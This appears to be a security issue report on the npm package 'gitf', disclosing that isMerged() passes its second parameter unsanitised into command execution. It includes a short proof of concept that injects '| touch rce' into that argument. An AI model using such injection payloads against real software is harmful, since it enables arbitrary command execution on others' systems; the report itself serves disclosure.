Potential command injection vulnerability in gitf #1
Description
Hi,
We would like to report a potential security vulnerability.
The bug is introduced because the package-exported method isMerged() fails to sanitize its 2nd parameter and lets it flow into a sensitive command execution API.
Here is the proof of concept.
const lib = require('gitf');
var gitf = new lib();
gitf.isMerged("", "| touch rce", () => {})// a file named rce will be created
Please consider fixing it. thanks!